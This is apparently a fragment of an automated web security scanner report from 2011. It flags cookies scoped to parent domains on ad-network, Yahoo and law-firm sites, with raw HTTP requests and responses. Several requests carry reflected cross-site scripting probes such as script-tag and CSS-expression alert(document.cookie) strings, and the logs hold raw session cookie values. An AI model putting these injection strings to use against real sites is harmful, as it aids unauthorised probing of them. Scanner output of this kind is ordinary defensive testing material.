FFad=0:0:0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFcat=0,0,0:933,56,15:1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /bar/v16-401/d3/jsc/fmr.js HTTP/1.1 Host: d7.zedo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; aps=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1; FFcat=933,56,15:1099,2,14; ZFFAbh=749B826,20|1483_749#365; FFad=0:0; FFCap=1463B1219,174796:933,196008|0,11,1:0,17,1;
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Length: 912 Content-Type: application/x-javascript Set-Cookie: FFad=0:0:0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=0,0,0:933,56,15:1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "812b9fe7-809a-4989a59833840" X-Varnish: 2233582316 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=284 Expires: Wed, 19 Jan 2011 18:11:59 GMT Date: Wed, 19 Jan 2011 18:07:15 GMT Connection: close
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
FFgeo=5386156;expires=Thu, 19 Jan 2012 15:50:46 GMT;domain=.zedo.com;path=/;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
ZFFAbh=749B826,20|1483_749#365;expires=Thu, 19 Jan 2012 15:50:47 GMT;domain=.zedo.com;path=/;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /red/psi/sites/www.csmonitor.com/p.json?callback=_ate.ad.hpr&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fwww.csmonitor.com%2FUSA1edc1%2522-alert(document.cookie)-%25228a5e635d48%2FJustice%2F2011%2F0118%2FSupreme-Court-declines-appeal-of-D.C.-gay-marriage-law&ref=http%3A%2F%2Fburp%2Fshow%2F25&jdg4df HTTP/1.1 Host: ds.addthis.com Proxy-Connection: keep-alive Referer: http://s7.addthis.com/static/r07/sh30.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; di=%7B%7D..1295378586.60|1293848200.66; dt=X; psc=4; uid=4d1ec56b7612a62c
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 179 Content-Type: text/javascript Set-Cookie: bt=; Domain=.addthis.com; Expires=Wed, 19 Jan 2011 15:51:10 GMT; Path=/ Set-Cookie: dt=X; Domain=.addthis.com; Expires=Fri, 18 Feb 2011 15:51:10 GMT; Path=/ Set-Cookie: di=%7B%7D..1295452270.19F|1295378586.60|1293848200.66; Domain=.addthis.com; Expires=Fri, 18-Jan-2013 12:57:24 GMT; Path=/ P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA" Expires: Wed, 19 Jan 2011 15:51:10 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 19 Jan 2011 15:51:10 GMT Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /gateway/gw.js?csid=K08784&auto=t HTTP/1.1 Host: js.revsci.net Proxy-Connection: keep-alive Referer: http://www.local.com/results.aspx?keyword=law+offices&CID=2531/x22b7005%22style%3d%22x%3aexpression(alert(document.cookie))%22e433a090613 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; udm_0=MLvv8iMJPj5n556Bo8jwxg27aVMsKvlZeh88v6LFxvi6NShB6ZO83AmHuP4JgK9bvgpJZgsqUaP2xfTnxNPh9+fmSEPkCVwJX705HIrDAdU6h9yhStmEjquZrguVeF3r0KH2OzLBVWAxUkwC4gAcARichgtw510EVacnhilf+8mRFAtdqKZBM6NUyjil0ZdVPRDqI+Ti+FIe6fewtlE9GinOst7C+rlOGLcLpjRwr3ZfMSayOJgkjwJdHiBSJ9kAcsoTnnNvaA7Xcb0oB88geiObO0gCWiOMGKuhN5NhpXa5wNJrUpjtCGmrVtVPNsrxL9ryWzajTucvw6SIgD8tYcWt49xZgaknzfQMm4nMuUr+qb1f+Ms3ek2Rc8bT/TWEYTevTxXB1YSJNhNpyO+5lLFTcDcxf+duWIK8eU0eIZAncGmWmIMN2HAprOXDL92vjPG5GfbTEfgpUERmJC38xypT/U/eZtb2YBNcle27OeZkVpQY88kycEdRsS0Ks4HLd9MJ6YiDUxLI3FUlyF0iCBOApuRiSn2zDur8XA1O6kZwXMP/vqnO/qlcm8YSMQteDyI8xTLOkrtw5XuzDTiehCDdIT5AUFXEVikG1xbWOf61/rLXUN710OVSlXuiKpp7slVOdtdIlvK5Ef2r/dR4A+dOCYr8QFU/PgPleGbyIL5+FSmkfzlkK9kpSlXIgokpHC3DmN7FSnZ4W681z5mM3+bkQyAQa1deCg6dY3j8xQBsPgkVRyyliBZ/BT5AfFB6Kt2bfoD+HZA9FOS08BLyiny5VyDBbEms9liC5Fs3TFj1lR+RyszTbus6ezqbVXF77t83kYCDwMJ+4srH8tO8ZoaqbVgfKSopwI144BcK1RceyhLfvKeO2mls6933wcTzEXOpWYxsjrgl5Q==; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=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; rsi_segs_1000000=pUPFfUnF7gMUVVNGyQq6Tc2UE03EygBbRXVdvuFY1BA6MUfyIuV86Lli0TAjp7vTbarnvaHN9T2ow1lTs80IFRatyDifWyk9mf1Kh7aRP1Ys1ciYX3r+3g5rrIF04H4FAiutUjgMss6NEqGMIeSYHxakEN/DRePx1bwHrbhXzJD91WqT8N1pQYXg+GpVj1vtVjK1+AiwL4ScNYq0oKT0cw==; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; 
rtc_0=MLuBa40HAV7DEFZEdMKVl168Ne30F2LgIMllRLOj2CnyxLwSlYtMGPNUFv6UJ75S23vXs9VpSODtSfbRXbKeKsIfm/9vVCVRHq5E9dPOyJm5LyxhQ0JLpdlLRkRi1AuT5G8QYh4GpDTxObx7HqsmwclpQmx8PITjRXvTVnlGDfiP+KG3TuYhIgfdoMdRUNcxsYfj/XLnOWpzH6FblA==
//Vermont-12.4.0-1012 var rsi_now= new Date(); var rsi_csid= 'K08784';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da){this._rsiaa=Da;this._rsiba ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /event-log-analysis-sm/ HTTP/1.1 Host: landesm.gfi.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <META http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Event log analysis & management</title>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /config/login HTTP/1.1 Host: login.yahoo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 18:09:20 GMT Set-Cookie: B=5u97cop6jea6g&b=3&s=jo; expires=Tue, 19-Jan-2013 20:00:00 GMT; path=/; domain=.yahoo.com P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" X-Frame-Options: DENY Cache-Control: private Connection: close Content-Type: text/html Content-Length: 41558
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Sign in ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /g.lt?nvst=12596&nvtt=z&nvup=1 HTTP/1.1 Host: lt.navegg.com Proxy-Connection: keep-alive Referer: http://rafael.adm.br/?ffb7d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E21b58676d82=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK P3P: CP='CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR' Set-Cookie: ltcid=547362597; path=/; domain=.navegg.com; expires=Wed, 19-Jan-2013 11:57:37 GMT Set-Cookie: inf= ; path=/; domain=.navegg.com; expires=Wed, 19-Jan-2011 15:57:37 GMT Content-type: application/javascript Date: Wed, 19 Jan 2011 17:57:37 GMT Server: lighttpd/1.4.19 Content-Length: 43
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Austin HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:53:25 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A53%3A25%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D1830%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:53:25 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Denver HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:53:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A53%3A54%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D1974%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:53:54 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /London HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:54:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A54%3A28%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2108%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:54:28 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /LosAngeles HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:54:45 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A54%3A45%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2193%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:54:45 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Minneapolis HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:54:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A54%3A54%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2239%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:54:54 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Riyadh HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:56:29 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A56%3A29%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2679%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:56:29 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /aboutus HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:48:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A48%3A57%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D190%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:48:57 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /alumni HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:49:23 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A23%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D435%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:23 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /aop HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:50:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A50%3A28%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D934%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:50:28 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /careers HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 302 Moved Temporarily Connection: close Date: Wed, 19 Jan 2011 15:49:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A07%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D268%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:07 GMT;path=/ location: http://www.joinfulbright.com Content-Type: text/html; charset=UTF-8
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dc/x22 HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:48:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A48%3A35%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D5%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:48:35 GMT;path=/ Content-Type: text/html; charset=UTF-8
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /downloads HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:49:58 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A58%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D752%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:58 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
